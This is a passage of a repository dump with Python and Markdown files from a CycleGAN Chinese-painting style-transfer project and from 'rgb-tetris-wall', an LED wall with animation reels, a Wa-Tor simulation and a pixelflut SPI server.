self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)\n\n def print_networks(self, verbose):\n \"\"\"Print the total number of parameters in the network and (if verbose) network architecture\n\n Parameters:\n verbose (bool) -- if verbose: print the network architecture\n \"\"\"\n print('---------- Networks initialized -------------')\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n if verbose:\n print(net)\n print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))\n print('-----------------------------------------------')\n\n def update_learning_rate(self):\n \"\"\"Update learning rates for all the networks; called at the end of every epoch\"\"\"\n old_lr = self.optimizers[0].param_groups[0]['lr']\n for scheduler in self.schedulers:\n scheduler.step()\n\n lr = self.optimizers[0].param_groups[0]['lr']\n print('learning rate %.7f -> %.7f' % 
(old_lr, lr))\n\n def get_current_losses(self):\n \"\"\"Return traning losses / errors. train.py will print out these errors on console, and save them to a file\"\"\"\n errors_ret = OrderedDict()\n for name in self.loss_names:\n if isinstance(name, str):\n errors_ret[name] = float(getattr(self, 'loss_' + name)) # float(...) works for both scalar tensor and float number\n return errors_ret\n\n def compute_visuals(self):\n \"\"\"Calculate additional output images for visdom and HTML visualization\"\"\"\n pass\n\n def save_networks(self, epoch):\n \"\"\"Save all the networks to the disk.\n\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n for name in self.model_names:\n if isinstance(name, str):\n save_filename = '%s_net_%s.pth' % (epoch, name)\n save_path = os.path.join(self.save_dir, save_filename)\n net = getattr(self, 'net' + name)\n\n if len(self.gpu_ids) > 0 and torch.cuda.is_available():\n torch.save(net.module.cpu().state_dict(), save_path)\n net.cuda(self.gpu_ids[0])\n else:\n torch.save(net.cpu().state_dict(), save_path)\n\n def get_current_visuals(self):\n \"\"\"Return visualization images. 
train.py will display these images with visdom, and save the images to a HTML\"\"\"\n visual_ret = OrderedDict()\n for name in self.visual_names:\n if isinstance(name, str):\n visual_ret[name] = getattr(self, name)\n return visual_ret\n\n def test(self):\n \"\"\"Forward function used in test time.\n\n This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop\n It also calls <compute_visuals> to produce additional visualization results\n \"\"\"\n with torch.no_grad():\n self.forward()\n self.compute_visuals()\n\n def get_image_paths(self):\n \"\"\" Return image paths that are used to load current data\"\"\"\n return self.image_paths\n" }, { "alpha_fraction": 0.5824790596961975, "alphanum_fraction": 0.6109039783477783, "avg_line_length": 33.06349182128906, "blob_id": "ae632a632cb23ee5360a7989c67154a6e45dc542", "content_id": "c4d35b959a88b08c11a6d0714bbacabd95d1b5fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2186, "license_type": "permissive", "max_line_length": 119, "num_lines": 63, "path": "/edge/hed.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import cv2 as cv\nimport os\nimport numpy as np\nimport matplotlib.image as mp\nfrom skimage import img_as_ubyte\nfrom PIL import Image\n\n\nclass CropLayer(object):\n def __init__(self, params, blobs):\n self.xstart = 0\n self.xend = 0\n self.ystart = 0\n self.yend = 0\n\n # Our layer receives two inputs. 
We need to crop the first input blob\n # to match a shape of the second one (keeping batch size and number of channels)\n def getMemoryShapes(self, inputs):\n inputShape, targetShape = inputs[0], inputs[1]\n batchSize, numChannels = inputShape[0], inputShape[1]\n height, width = targetShape[2], targetShape[3]\n\n self.ystart = (inputShape[2] - targetShape[2]) // 2\n self.xstart = (inputShape[3] - targetShape[3]) // 2\n self.yend = self.ystart + height\n self.xend = self.xstart + width\n\n return [[batchSize, numChannels, height, width]]\n\n def forward(self, inputs):\n return [inputs[0][:,:,self.ystart:self.yend,self.xstart:self.xend]]\n\n\ndef extract_edge(frame):\n # Load the model.\n net = cv.dnn.readNet(cv.samples.findFile('deploy.prototxt'), cv.samples.findFile('hed_pretrained_bsds.caffemodel'))\n inp = cv.dnn.blobFromImage(frame, scalefactor=1.0, size=(frame.shape[1], frame.shape[0]),\n mean=(104.00698793, 116.66876762, 122.67891434),\n swapRB=False, crop=False)\n net.setInput(inp)\n edge = net.forward()\n edge = edge[0, 0]\n edge = cv.resize(edge, (frame.shape[1], frame.shape[0]))\n edge = cv.merge([edge, edge, edge])\n frame = frame/2 + frame/2 * edge\n return frame\n\n\nif __name__ == '__main__':\n # ! [Register]\n cv.dnn_registerLayer('Crop', CropLayer)\n # ! 
[Register]\n path = \"..\\\\data\\\\org_trainA\\\\\" # 图像读取地址\n savepath = \"..\\\\data\\\\trainA\\\\\" # 图像保存地址\n filelist = os.listdir(path) # 打开对应的文件夹\n\n for item in filelist:\n name = path + item\n img = cv.imread(name)\n rst = extract_edge(img)\n save_name = savepath + item\n print(item+' is processed and saved to '+save_name)\n cv.imwrite(save_name, rst)\n" }, { "alpha_fraction": 0.5723684430122375, "alphanum_fraction": 0.7960526347160339, "avg_line_length": 29.299999237060547, "blob_id": "50e80563d56c322e1e3f0c55e5a209763c25129b", "content_id": "e7a63ee710db9f03958d08bfd1c1fdc943854be1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "permissive", "max_line_length": 71, "num_lines": 10, "path": "/README.md", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "# CycleGan-for-Computer-Photography\nA course project for Computer Photography class of Zhejiang University.\n\n#### The Results:\n\n![image-20210617001637880](README.assets/image-20210617001637880.png)\n\n#### The Graphic User Interface:\n\n![image-20210617001721302](README.assets/image-20210617001721302.png)\n\n" }, { "alpha_fraction": 0.508171796798706, "alphanum_fraction": 0.5378183126449585, "avg_line_length": 50.588233947753906, "blob_id": "c5de90d2b7783e61f0be27687bcad44f13c993ba", "content_id": "cdcc4960875989ae08fa8b6b012b5f70a954de77", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2631, "license_type": "permissive", "max_line_length": 314, "num_lines": 51, "path": "/utils/params.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "opt = dict( load_size=286, # scale images to this size\n crop_size=256, # then crop to this size\n batch_size=1, # input batch size\n num_threads=1, # treads for loading data\n gpu_ids=[0], # id of gpu\n lambda_identity=0.5, # use identity 
mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1\n lambda_A=10.0, # weight for cycle loss (A -> B -> A)\n lambda_B=10.0, # weight for cycle loss (B -> A -> B)\n input_nc=3,\n output_nc=3,\n ngf=64, # of gen filters in the last conv layer\n ndf=64, # of discriminator filters in the first conv layer\n no_dropout=False,\n init_gain=0.02, # scaling factor for normal, xavier and orthogonal.\n pool_size=50, # the size of image buffer that stores previously generated images\n lr=0.0002, # initial learning rate for adam\n beta1=0.5, # momentum term of adam\n display_id=-1, # window id of the web display\n no_html=False,\n display_winsize=256, # display window size for both visdom and HTML\n name='Chinese Painting Style',\n display_port=8888, # visdom port of the web display\n display_ncols=4, # if positive, display all images in a single visdom web panel with certain number of images per row.\n display_server=\"http://localhost\", # visdom server of the web display\n display_env='main',\n checkpoints_dir='.\\\\checkpoints',\n n_layers_D=3, # only used if netD==n_layers\n\n epoch_count=1,\n n_epochs=25,\n n_epochs_decay=25,\n\n continue_train=False,\n load_iter=0,\n epoch='latest',\n verbose=False,\n print_freq=100, # frequency of showing training results on console\n display_freq=400,\n update_html_freq=1000, # frequency of saving training results to html\n save_latest_freq=5000,\n save_by_iter=False,\n save_epoch_freq=5,\n\n n_epochs_D=2,\n\n results_dir='./results/',\n phase='test',\n num_test=500,\n aspect_ratio=1.0,\n\n )\n" } ]
13
deepestcyber/rgb-tetris-wall
https://github.com/deepestcyber/rgb-tetris-wall
0a3f5fee5ce3fe947d6a56d1a6feb16e9e9a4da9
8ec63ec8a4b7a0f89d0dd427b5c2e786a03c5a83
075e1cb9ed0e9c6f0eb3e07c721a7e719df9989d
refs/heads/master
2022-11-26T05:51:35.462406
2019-12-12T21:49:27
2019-12-12T21:49:27
120,461,677
4
0
null
2018-02-06T13:33:53
2019-12-12T21:50:02
2022-11-22T02:31:27
Python
[ { "alpha_fraction": 0.6241610646247864, "alphanum_fraction": 0.681208074092865, "avg_line_length": 18.866666793823242, "blob_id": "57935a3db0e96dcdbaa44b0fe60991bed3b3ad2c", "content_id": "1979f237ab38ecbfd367eb174e20d4f4c92fdd78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 50, "num_lines": 15, "path": "/raspi_preproc/workbench/streaming/util/show_single.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom encoding import UYVY_RAW2RGB_PIL\n\nwith open('test.raw', 'rb') as f:\n data = np.array(list(f.read()), dtype='uint8')\n\nimg = UYVY_RAW2RGB_PIL(data, 720, 576)\nimg.show()\n\n#frame = data[1::2].reshape(720, 576)\n\n#plt.imshow(frame)\n#plt.show()\n" }, { "alpha_fraction": 0.4063529074192047, "alphanum_fraction": 0.44392794370651245, "avg_line_length": 19.407114028930664, "blob_id": "26848b61ca87f255987431ff6956ece8ac982714", "content_id": "8ed5b6b0eb278d74e2ed95f65186b3abd522d733", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5163, "license_type": "no_license", "max_line_length": 71, "num_lines": 253, "path": "/reels/argos.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nArgos reel for LED wall.\n\nJust some harmless eyes, looking around.\n\nTODO: check if colours look decent on wall.\n\nCreated by kratenko.\n\"\"\"\nimport numpy as np\nimport time\nimport random\n\nfrom fluter import Fluter\n\n\niris = \"\"\"\n -\n aaaa -\n aaaaaa -\n aaaooaaa -\n aaooooaa -\n aaooooaa -\n aaaooaaa -\n aaaaaa -\n aaaa -\n -\n -\n\"\"\"\n\nball = \"\"\"\n -\n -\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\nwwwwwwwwwwwwwwww-\n\n\"\"\"\n\nlid1 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxx 
xxv...-\n.vxx xxv.-\nvx xv-\nx x-\nvx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid2 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxx xxxxxx xxv.-\nvx xv-\nx x-\nvx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid3 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxxyyyyyyyyxxv.-\nvx xxyyyyxx xv-\nx xxxx x-\nvx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid4 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxxyyyyyyyyxxv.-\nvxyyyyyyyyyyyyxv-\nx xxyyyyyyyxxx x-\nvx xxxxxxxx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid5 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxxyyyyyyyyxxv.-\nvxyyyyyyyyyyyyxv-\nxyyyyyyyyyyyyyyx-\nvxyyyyyyyyyyyyxv-\n.vxyyyyyyyyyyxv.-\n..vxxyyyyyyxxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlids = [lid1, lid1, lid1, lid4, lid5]\n\ncmap = {\n \".\": [0x00, 0x00, 0x00],\n \"w\": [0xd8, 0xd8, 0xd8],\n \"X\": [0x80, 0x80, 0x80],\n \"x\": [0xea//2, 0xc0//2, 0x86//2],\n \"v\": [0xea//6, 0xc0//6, 0x86//6],\n \"y\": [0xea, 0xc0, 0x86],\n \"b\": [0xff, 0xff, 0xff],\n}\n\nc2map = [\n # blue\n {\n \"a\": [0x00, 0x6d, 0xcc],\n \"o\": [0x02, 0x24, 0x3d],\n },\n # green\n {\n \"a\": [0x02, 0xbb, 0x39],\n \"o\": [0x01, 0x3d, 0x09]\n },\n # yellow\n {\n \"a\": [0xac, 0xbc, 0x01],\n \"o\": [0x3b, 0x3c, 0x00]\n },\n # red\n {\n \"a\": [0xb5, 0x51, 0x03],\n \"o\": [0x3c, 0x16, 0x01]\n }\n]\n\n\ndef draw(a, s, trans=None, colour=0):\n if trans is None:\n trans = (0, 0)\n h, w, d = np.shape(a)\n y = -1\n for line in s.split(\"\\n\"):\n if not line:\n continue\n y += 1\n if y >= h:\n break\n _y = y + trans[0]\n if not 0 <= _y < h:\n continue\n for x, c in enumerate(line):\n if x >= w:\n break\n _x = x + trans[1]\n if not 0 <= _x < w:\n continue\n if c in cmap:\n a[_y, _x] = cmap[c]\n else:\n if 0 <= colour < len(c2map):\n if c in 
c2map[colour]:\n a[_y, _x] = c2map[colour][c]\n\n\nclass Eye:\n blinking = [1, 2, 3, 4, 4, 4, 4, 3, 2, 1]\n\n def __init__(self):\n self.direction = (0, 0)\n self.colour = 0\n self.lid_pos = 0\n self.action = None\n self.progress = None\n self.idle_time = None\n self.idle_next = None\n self.start_action(\"idle\")\n\n def update(self):\n self.progress += 1\n if self.action == \"close\":\n if self.progress <= 4:\n self.lid_pos = self.progress\n else:\n self.start_action(\"closed\")\n elif self.action == \"closed\":\n if self.progress > 2:\n self.change_colour()\n self.start_action(\"open\")\n elif self.action == \"open\":\n if 1 <= self.progress <= 4:\n self.lid_pos = 4 - self.progress\n else:\n self.start_action(\"idle\")\n elif self.action == \"move\":\n self.change_direction()\n self.start_action(\"idle\")\n elif self.action == \"idle\":\n if self.progress >= self.idle_time:\n self.start_action(self.idle_next)\n\n def start_action(self, action):\n self.action = action\n self.progress = 0\n if action == \"idle\":\n self.idle_time = random.randint(30, 120)\n if random.randint(1, 10) == 1:\n self.idle_next = \"close\"\n else:\n self.idle_next = \"move\"\n\n def change_direction(self):\n self.direction = (random.randint(-2, 2), random.randint(-3, 3))\n\n def change_colour(self):\n if random.randint(1, 5) == 1:\n self.colour = random.randint(0, len(c2map) - 1)\n\n def draw(self):\n a = np.zeros((11, 16, 3), dtype=np.uint8)\n draw(a, ball)\n draw(a, iris, self.direction, colour=self.colour)\n draw(a, lids[self.lid_pos])\n return a\n\n\nfluter = Fluter()\n\ntop_off = (0, 0)\n\na = np.zeros((24, 16, 3), dtype=np.uint8)\ntop = Eye()\nbot = Eye()\n\nwhile True:\n a[:11,:,:] = top.draw()\n a[13:24,:,:] = bot.draw()\n fluter.send_array(a)\n top.update()\n bot.update()\n time.sleep(.05)\n" }, { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.630476176738739, "avg_line_length": 22.81818199157715, "blob_id": "46171e6d3b6fe9580735e55b9a7a6c7ad06672f4", "content_id": 
"415b7f6bd630701efb955276f15d4f021e6922cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 525, "license_type": "no_license", "max_line_length": 70, "num_lines": 22, "path": "/raspi_preproc/audio_beatdetection.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import datetime\nimport numpy as np\n\n\nclass AudioBeatdetection:\n\n def __init__(self, _num_leds_h=16, _num_leds_v=24):\n self.num_leds_h = _num_leds_h\n self.num_leds_v = _num_leds_v\n self.leds = np.zeros((_num_leds_v, _num_leds_h, 3))\n\n self.last_measurement = datetime.datetime.now()\n\n #TODO\n\n def generate_frame(self, pattern=0):\n\n # TODO trigger the measurements for beat detection\n\n # TODO trigger some neat visualisations (based on pattern arg)\n\n return self.leds\n\n" }, { "alpha_fraction": 0.6137373447418213, "alphanum_fraction": 0.6193939447402954, "avg_line_length": 27.779069900512695, "blob_id": "99f9e1775e076f4eb69f98eb3ff1ff4b83f81a54", "content_id": "8e04ef5df62ff12c1bf57c19c5c4c100a763dced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "no_license", "max_line_length": 93, "num_lines": 86, "path": "/raspi_preproc/image_loader.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nimport random\nfrom PIL import Image\nfrom PIL import ImageEnhance\n\n_FORMAT = \"RGB\"\n\nclass ImageLoader:\n\n def __init__(self, _num_leds_h=16, _num_leds_v=24):\n self.num_leds_h = _num_leds_h\n self.num_leds_v = _num_leds_v\n self.leds = np.zeros((_num_leds_v, _num_leds_h, 3)) #should be not necessary\n\n self.black = (0, 0, 0)\n self.ipath = \"../images\"\n self.default_image_name = \"black.png\"\n self.image_name = self.default_image_name\n self.get_image_list()\n self.img_leds = Image.new(_FORMAT, (self.num_leds_h, 
self.num_leds_v), self.black)\n\n self.load_image(self.default_image_name)\n\n\n def enhance_image(self, img):\n factor = 1.5\n converter = ImageEnhance.Color(img)\n return converter.enhance(factor)\n\n\n def get_image_list(self):\n self.image_list = [f for f in listdir(self.ipath) if isfile(join(self.ipath, f))]\n\n self.image_list.sort()\n\n return\n\n def load_image(self, name):\n if any(name in n for n in self.image_list):\n self.img_leds = Image.open(self.ipath+\"/\"+name).\\\n resize((self.num_leds_h, self.num_leds_v)).convert(\"RGB\")\n\n self.img_leds = self.enhance_image(self.img_leds)\n\n self.leds = np.array(self.img_leds)\n return self.leds\n\n def load_random_image(self):\n self.image_name = self.image_list[random.randint(0, len(self.image_list)-1)]\n\n return self.load_image(self.image_name)\n\n def load_next_image(self):\n\n pos = self.image_list.index(self.image_name)\n self.image_name = self.image_list[(pos+1)%len(self.image_list)]\n\n return self.load_image(self.image_name)\n\n def load_prev_image(self):\n\n pos = self.image_list.index(self.image_name)\n self.image_name = self.image_list[(len(self.image_list)+pos-1)%len(self.image_list)]\n\n return self.load_image(self.image_name)\n\n def load_numbered_image(self, number):\n\n self.image_name = self.image_list[(number+len(self.image_list))%len(self.image_list)]\n\n return self.load_image(self.image_name)\n\n\n#for debug:\nif __name__ == \"__main__\":\n\n iload = ImageLoader()\n\n leds = iload.load_random_image()\n print(iload.ipath+\"/\"+iload.image_name)\n print(\"debug -\", \"leds:\", leds.shape)\n Image.fromarray(leds).save(\"leds.png\", \"PNG\")\n\n #img.convert(\"RGB\").save(\"leds.png\", \"PNG\")\n" }, { "alpha_fraction": 0.63246750831604, "alphanum_fraction": 0.6883116960525513, "avg_line_length": 19.783782958984375, "blob_id": "5808b3395e24d44eeaf5ebbf8462e901bb465902", "content_id": "b4b05f877e6cfa6fe8e485b2c21a74b63491b1cb", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Markdown", "length_bytes": 770, "license_type": "no_license", "max_line_length": 138, "num_lines": 37, "path": "/pixelflut/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# Pixelflut @ tetriswall\n\n## Setup\n\n $ virtualenv -p python3 flut\n\t$ . flut/bin/activate\n\t$ pip install -r requirements.txt\n\nDebian packages you might need:\n\n- `libcairo2-dev`\n\n## Running in canvas mode\n\nCanvas mode is just a dummy server to draw pixels on a cairo canvas.\nStart:\n\n $ python pixelflut.py canvas_brain.py\n\n## Running in SPI mode\n\nThis mode is for the tetris wall and makes sure that the dimensions\nof the wall are respected.\nStart:\n\n\t$ DISPLAY=:0.0 python pixelflut.py spi_brain.py\n\t\n\n## Quick test\n\nSet one pixel at x=10, y=10 to green:\n\n\t$ echo 'PX 10 10 #00AA00' | nc -q1 localhost 1234\n\nDraw some lines:\n\n\t$ for j in `seq 0 5 100`; do for i in {0..640}; do echo \"px $i $j #AA0000\"; echo \"px $j $i #00AA00ff\"; done; done | nc -q1 localhost 1234\n\n" }, { "alpha_fraction": 0.5852307677268982, "alphanum_fraction": 0.6138461828231812, "avg_line_length": 20.95945930480957, "blob_id": "dbdad29cdbcb745cb5880062ce2e92e4aed59a11", "content_id": "e8900967cd01e0aa3e1ef8061ae5c9dc5501601a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3250, "license_type": "no_license", "max_line_length": 74, "num_lines": 148, "path": "/pixelflut/spi_brain.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import logging\nimport base64\n\nimport pigpio\nfrom pygame.surfarray import array3d\n\n# GPIO pin numbers\nSYNC_PIN = 24\n# canvas parameters\nCANVAS_WIDTH = 16\nCANVAS_HEIGHT = 24\n\nlog = logging.getLogger('brain')\nlog.debug('lol')\n\n\nticks = 0\n\ntry:\n pi = pigpio.pi()\n spi = pi.spi_open(0, 500000, 0) # 243750 487500 975000 1950000\n pi.set_mode(SYNC_PIN, pigpio.INPUT) # define pulldown/pullup\nexcept:\n # 
Possibly the gpio daemon broke or we are not running on a pi.\n input('Continue?')\n pi = None\n spi = None\n\n\ndef send_canvas_over_spi(canvas):\n global spi, array3d, pi\n global CANVAS_WIDTH, CANVAS_HEIGHT, SYNC_PIN\n global log\n import numpy as np\n\n log.debug('send_canvas_over_spi')\n\n leds = array3d(canvas.screen).astype('uint8')\n leds = leds[:CANVAS_WIDTH, :CANVAS_HEIGHT, :]\n #leds = np.random.uniform(0, 1, size=(16, 24, 3)) * 255\n #leds = leds.astype('uint8')\n data = leds.flatten().tobytes()\n\n # just wait, until the sync pin is set\n while ((pi.read_bank_1() >> SYNC_PIN) & 1) != 1:\n pass\n\n (num, byte) = pi.spi_read(spi, 1)\n\n pi.spi_write(spi, data)\n\n\n@on('LOAD')\ndef load(canvas):\n log.debug('load event')\n\n return # remove if canvas should be resized as well\n\n global CANVAS_WIDTH, CANVAS_HEIGHT\n import pygame\n size = CANVAS_WIDTH, CANVAS_HEIGHT\n canvas.screen = pygame.display.set_mode(size, canvas.flags)\n canvas.width, canvas.height = size\n\n\n@on('RESIZE')\ndef resize(canvas):\n global log\n log.debug('resize event')\n\n\n@on('QUIT')\ndef quit(canvas):\n global log\n log.debug('quit event')\n\n\n@on('TICK')\ndef tick(canvas):\n global log\n global ticks\n global send_canvas_over_spi\n if ticks % 50 == 0:\n print('.')\n\n # TODO: it would be best to have this here but it blocks everything :/\n send_canvas_over_spi(canvas)\n\n ticks += 1\n\n\n@on('CONNECT')\ndef connect(canvas, client):\n global log\n log.debug('connect event %s', client)\n\n\n@on('DISCONNECT')\ndef disconnect(canvas, client):\n global log\n log.debug('disconnect event %s', client)\n\n\n@on('COMMAND-PX')\ndef command_px(canvas, client, *args):\n global log\n global send_canvas_over_spi\n log.debug('px command event %s %s', client, args)\n assert len(args) == 3\n\n x, y, c = args\n c = c.lower().strip('#')\n\n assert x.isdecimal()\n assert y.isdecimal()\n assert 6 <= len(c) <= 8\n\n # pad optional alpha\n c += 'f' * (8 - len(c))\n\n x, y = int(x), int(y)\n r, g, b, 
a = tuple(int(c[i:i+2], 16) for i in (0, 2, 4, 6))\n\n canvas.set_pixel(x, y, r, g, b, a)\n #send_canvas_over_spi(canvas)\n return True\n\n\n@on('COMMAND-WL')\ndef command_wl(canvas, client, *args):\n global log, base64\n global send_canvas_over_spi\n log.debug(\"wl command event %s %d args\", client, len(args))\n w, h = canvas.size\n raw_size = w * h * canvas.depth\n b64_size = int(raw_size + raw_size/3)\n assert len(args) == 1\n base = args[0]\n assert len(base) == b64_size\n data = base64.b64decode(base)\n assert len(data) == raw_size\n\n for y in range(h):\n for x in range(w):\n p = (y*w + x) * 3\n canvas.set_pixel(x, y, data[p], data[p+1], data[p+2], 0xff)\n #send_canvas_over_spi(canvas)\n return True\n" }, { "alpha_fraction": 0.659919023513794, "alphanum_fraction": 0.6659919023513794, "avg_line_length": 21.976743698120117, "blob_id": "b683b6ce1ad638164385c732b17740b4e342b127", "content_id": "dc907d18ca906436d4bc117d899fc1cd9f9ec574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 988, "license_type": "no_license", "max_line_length": 72, "num_lines": 43, "path": "/reels/slowimg.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nImage sending reel using PX command.\n\nSimple reel that sends random images from a directory to the Wall.\nUses the standard pixelflut PX command to send one pixel at a time.\nThis is very slow and you can see the image change.\n\nCreated by kratenko.\n\"\"\"\nimport os\nimport random\nimport time\n\nimport numpy as np\nfrom PIL import Image\n\nfrom fluter import Fluter\n\nfluter = Fluter()\n\n\ndef get_random_file(path):\n \"\"\"\n Returns a random filename, chosen among the files of the given path.\n \"\"\"\n files = os.listdir(path)\n index = random.randrange(0, len(files))\n return os.path.join(path, files[index])\n\n\ndef send(img):\n arr = np.array(img)\n for i in range(0, img.size[0]):\n for j in range(0, img.size[1]):\n 
fluter.send_pixel((i, j), arr[j, i])\n\n\nwhile True:\n # prepare image (open, convert to rgba, resize, convert to array)\n fn = get_random_file(\"../images\")\n print(\"sending image '{}'\".format(fn))\n send(Image.open(fn))\n time.sleep(1)\n" }, { "alpha_fraction": 0.4145016670227051, "alphanum_fraction": 0.4307982921600342, "avg_line_length": 25.462499618530273, "blob_id": "cd4509f3df29a80983b11bd4c587e86cbe0fff2b", "content_id": "f3079f1e4cc08cb46b61025655f92e371b2935ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4234, "license_type": "no_license", "max_line_length": 83, "num_lines": 160, "path": "/reels/wator.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nRGB Reel Wator Simulation\n\nA reel implementing the Wator Simulation. Uses the energy based version for\nthe predators. When the simulation hits either final state it restarts.\n\nTODO: configuration of parameters from outside (program args)\nTODO: biased initialization\nTODO: non-energy-based variant\n\nSee https://en.wikipedia.org/wiki/Wa-Tor\n\nCreated by kratenko\n\"\"\"\nimport numpy as np\nimport random\nimport time\nimport math\nimport os\nfrom PIL import Image\n\nfrom fluter import Fluter\n\nW, H = 16, 24\n\nf = np.random.randint(-1, 2, size=(H, W), dtype=np.int16)\n\nFISH_BREED = 3\nFISH_ENERGY = 5\nSHARK_STARVE = 2\nSHARK_BREED = 10\n\nfluter = Fluter()\nimg_skull = Image.open(os.path.join(\"img\", \"skull.png\"))\nimg_fish = Image.open(os.path.join(\"img\", \"cheep-cheep-blue.png\"))\n\n\ndef send(f):\n water = [0, 0, 0]\n fish = [0, 0, 0xff]\n shark = [0, 0xff, 0]\n d = np.zeros((H, W, 3), dtype=np.uint8)\n d[f<0] = shark\n d[f==0] = water\n d[f>0] = fish\n fluter.send_array(d)\n\n\ndef get_neigh(y, x):\n # no diagonal:\n return [((y - 1) % H, x), (y, (x + 1) % W), ((y + 1) % H, x), (y, (x - 1) % W)]\n\n\ndef dest_condition(f, y, x, condition):\n neigh = get_neigh(y, x)\n if condition == 
0:\n conditioned = [a for a in neigh if f[a] == 0]\n elif condition == 1:\n conditioned = [a for a in neigh if f[a] > 0]\n else:\n conditioned = []\n if conditioned:\n return random.choice(conditioned)\n else:\n return None\n\n\ndef move_fish(f):\n moved = np.zeros((H, W), dtype=bool)\n for y in range(H):\n for x in range(W):\n if f[y, x] > 0:\n # fish\n if not moved[y, x]:\n dest = dest_condition(f, y, x, 0)\n if dest:\n val = f[y, x] + 1\n if val >= FISH_BREED:\n f[dest] = 1\n f[y, x] = 1\n else:\n f[dest] = val\n f[y, x] = 0\n moved[dest] = True\n else:\n f[y, x] = min(f[y, x] + 1, FISH_BREED)\n moved[y, x] = True\n\n\ndef move_shark(f):\n moved = np.zeros((H, W), dtype=bool)\n for y in range(H):\n for x in range(W):\n if f[y, x] < 0:\n # shark\n if not moved[y, x]:\n dest = dest_condition(f, y, x, 1)\n if dest:\n # find fish\n f[dest] = f[y, x] - FISH_ENERGY\n if f[dest] < -SHARK_BREED:\n # breed new shark\n val = f[dest]\n f[dest] = math.floor(val/2)\n f[y, x] = math.ceil(val/2)\n moved[dest] = True\n moved[y, x] = True\n else:\n f[y, x] = 0\n moved[dest] = True\n elif f[y, x] <= 1:\n # starved to death:\n f[y, x] = 0\n else:\n # no fish, just move\n dest = dest_condition(f, y, x, 0)\n if dest:\n f[dest] = f[y, x] - 1\n f[y, x] = 0\n moved[dest] = True\n else:\n f[y, x] -= 1\n moved[y, x] = True\n\n\ndef step(f):\n move_fish(f)\n move_shark(f)\n\n\nfields = W * H\nruns = 1\nsteps = 0\n\ndef redo():\n global f, steps, runs\n steps = 0\n runs += 1\n f = np.random.randint(-1, 2, size=(H, W), dtype=np.int16)\n\n\nwhile True:\n fish = np.sum(f>0)\n sharks = np.sum(f<0)\n print(\"Run %d, Step %d -- Fish: %d, Sharks: %d\" % (runs, steps, fish, sharks))\n send(f)\n # eval\n if fish == 0 and sharks == 0:\n fluter.send_image(img_skull)\n time.sleep(2)\n redo()\n continue\n elif fish == fields:\n fluter.send_image(img_fish)\n time.sleep(2)\n redo()\n continue\n step(f)\n steps += 1\n time.sleep(.2)\n" }, { "alpha_fraction": 0.5439143776893616, "alphanum_fraction": 
